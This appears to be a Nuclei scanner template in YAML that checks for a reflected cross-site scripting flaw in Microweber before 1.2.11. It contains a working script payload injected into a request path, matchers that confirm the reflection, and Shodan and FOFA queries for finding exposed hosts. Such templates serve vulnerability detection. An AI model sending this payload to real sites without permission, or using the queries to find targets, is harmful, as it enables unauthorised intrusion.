47 lines
1.4 KiB
YAML
47 lines
1.4 KiB
YAML
id: microweber-xss
|
|
|
|
info:
|
|
name: Microweber Cross-Site Scripting
|
|
author: gy741
|
|
severity: high
|
|
description: Microweber prior to 1.2.11 is susceptible to reflected cross-site Scripting via Packagist microweber/microweber.
|
|
reference:
|
|
- https://github.com/microweber/microweber/issues/809
|
|
- https://github.com/microweber/microweber
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query:
|
|
- http.favicon.hash:780351152
|
|
- http.html:"microweber"
|
|
product: microweber
|
|
vendor: microweber
|
|
fofa-query:
|
|
- icon_hash=780351152
|
|
- body="microweber"
|
|
tags: microweber,xss,oss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(document.domain)</script>¶ms=filetype=images#path='
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '<script>alert(document.domain)</script>" 0="filetype=images"'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022066f3c9006a7158f76f1a048b6da35122197d19f4d0a2017ee84b0f1d11128207022100c0812ee39304d8b5a3a9773cd75a18e18bd232517835c87afb3c964aa72967f8:922c64590222798bb761d5b6d8e72950 |